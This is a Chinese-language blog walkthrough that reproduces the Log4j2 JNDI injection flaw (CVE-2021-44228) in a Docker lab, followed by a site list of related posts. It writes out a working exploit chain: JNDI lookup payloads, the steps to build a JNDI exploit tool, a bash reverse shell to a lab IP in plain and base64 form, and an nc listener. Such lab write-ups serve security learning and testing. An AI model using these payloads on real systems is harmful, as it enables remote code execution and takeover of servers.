Apache Log4j2 lookup JNDI 注入漏洞复现(CVE-2021-44228)

已于 2024-01-13 17:34:11 修改
阅读量101 收藏
点赞数
分类专栏: 漏洞复现 文章标签: log4j java安全 漏洞复现
于 2022-04-24 22:22:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49125123/article/details/133041440
版权

一、搭建环境

1. 首先拉一个docker镜像
docker pull vulfocus/log4j2-rce-2021-12-09

在这里插入图片描述

2. 然后启动环境

查看镜像

docker images

在这里插入图片描述

可以使用仓库名也可以使用image id创建容器

docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09
docker run -d -p 8080:8080 be0c61922043

在这里插入图片描述

  • docker run : 创建一个新的容器并运行一个命令

  • -d: 后台运行容器,并返回容器ID

  • -p: 指定端口映射,格式为:主机(宿主)端口:容器端口

浏览器访问目标ip的8080端口,至此环境就搭好了。

在这里插入图片描述在这里插入图片描述

二、获取shell

首先,试验一下DNSLog

POST传参

payload=${jndi:ldap://4rm39n.dnslog.cn}

在这里插入图片描述

成功获取记录

在这里插入图片描述

1. 准备JNDI注入工具
下载

Github项目地址:

GitHub - sayers522/JNDI-Injection-Exploit: JNDI命令注入利用

Github下载慢的可以下载Gitee的

git clone https://gitee.com/Lemon_i/JNDI-Injection-Exploit.git

在这里插入图片描述

进入目录打包成jar包
mvn clean package -DskipTests

在这里插入图片描述

2. 利用
生成payload

准备payload

bash -i >& /dev/tcp/192.168.171.20/1234 0>&1

base64编码:

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4yMC8xMjM0IDA+JjE=

在这里插入图片描述

进入target目录利用JNDI注入工具生成payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4yMC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.171.20"

在这里插入图片描述
使用上图的这个生成的payload:

rmi://192.168.171.20:1099/ExploitBypass
反弹shell

Kali另一个终端开启nc监听

nc -lvvp 1234

打开浏览器,用POST传递payload

payload=${jndi:rmi://192.168.171.20:1099/ExploitBypass}

在这里插入图片描述

可以看到shell已经反弹成功

在这里插入图片描述

参考资料:

【Log4j】Log4j2 RCE漏洞复现与GetShell_哔哩哔哩_bilibili

铭说 | Apache Log4j2 RCE原理验证和复现(附CVE-2021-4101应急处置)

CVE-柠檬i
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Log4j2JNDI注入漏洞原理分析与思考,java面试线程池
uftdv17136的博客
03-29 1003
这个月马上就又要过去了,还在找工作的小伙伴要做好准备了,小编整理了大厂java程序员面试涉及到的绝大部分面试题及答案,希望能帮助到大家既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Java开发知识点,真正体系化!由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新如果你觉得这些内容对你有帮助,可以添加V获取:vip1024b (备注Java
spring-jndi-lookup:如何使用Spring从JNDI查找数据源
05-14
春天jndi查找 如何使用Spring从JNDI查找数据源 Server.xml <... maxActive="100" maxIdle="20" minIdle="5" ...jee:jndi-lookup id =“ dataSource” jndi-name =“ jdbc / javatechie” Expected
Apache Log4j2 lookup JNDI 注入漏洞CVE-2021-44228
qq_41696518的博客
06-13 850
环境:使用Vulhub的漏洞环境工具:bp和JNDIExploit-1-1.2,需要Java环境!!
Log4j2JNDI注入漏洞CVE-2021-44228
黑白的博客
10-13 4598
好好学习,天天向上。
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 4023
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
vulhub中Apache Log4j2 lookup JNDI 注入漏洞CVE-2021-44228
yougexiaojiuguan的博客
02-19 765
漏洞复现过程的记录
Log4j2JNDI注入漏洞CVE-2021-44228)原理分析与思考
jidunkeji的博客
12-24 2988
最近Log4j2JNDI注入漏洞CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。本篇文章即对该漏洞进行复现和分析其形成原理。
Log4j2漏洞复现CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
log4j2远程代码执行漏洞复现CVE-2021-44228
Wshchf的博客
06-04 590
Apache log4j2—RCE 漏洞是由于Log4j2 提供的lookup功能下的jndi Lookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的数据进行判断,导致Log4j2 请求远程主机上含有恶意代码的资源并执行其中的代码,从而造成远程代码执行漏洞log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
weixin_45715461的博客
06-28 3893
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
RevitLookup-2021.0.0.13
05-03
RevitLookup-2021.0.0.13,供各位做REVIT二次开发的同仁们下载、学习、研究。
log4j实用配置扩展
02-27
主要讲述log4j的简介,以及log4j的配置和在实际应用的使用。如果您不知道如何配置log4j,那么这本书将对您有很大的帮助。
country-code-lookup:通过各种国家_地区代码查找国家_地区
05-09
支持的代码: FIPS 10-4码(2位) ISO 3166(2位数字) ISO 3166(3位数字) ISO 3166(数字) 互联网代码安装$ npm install country-code-lookup用法const lookup = require ( 'country-code-lookup' )// search ...
Revit lookup2016-2022源代码
11-01
Revit lookup2016-2022源代码
SpringBoot 多模块 多环境 项目 单元测试
06-01 318
现在要想采用单元测试的方式对B中的方法,采用application-dev.yml配置中的信息,进行单元测试。在B项目的test资源包(resources)下的、项目启动类所在同一包层次下创建任意类,为该类添加。其中,D依赖C,C依赖B,B依赖A,D对外提供最终的访问接口。创建单元测试类,在其中通过。
基于jsp+servlet+mysql的javaweb健身房俱乐部系统
06-01
包括系统管理后台和前端动态网页的设计搭建。系统管理后台提供给俱乐部员工使用,可以对俱乐部的课程、器材、房间等进行管理维护;前端网页主要提供给消费者使用,可以在线浏览课程、预约上课等。 技术栈:JavaScript,Mysql 数据库,JSP、tomcat、HTML、CSS。
Tomcat安装配置基础详细教程讲解.docx
06-01
tomcat安装及配置教程 Tomcat安装配置基础详细教程讲解.docx
51单片机智能百叶窗项目
最新发布
06-01
51单片机智能百叶窗项目
apache log4j CVE-2021-44228漏洞怎么解决
06-03
Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值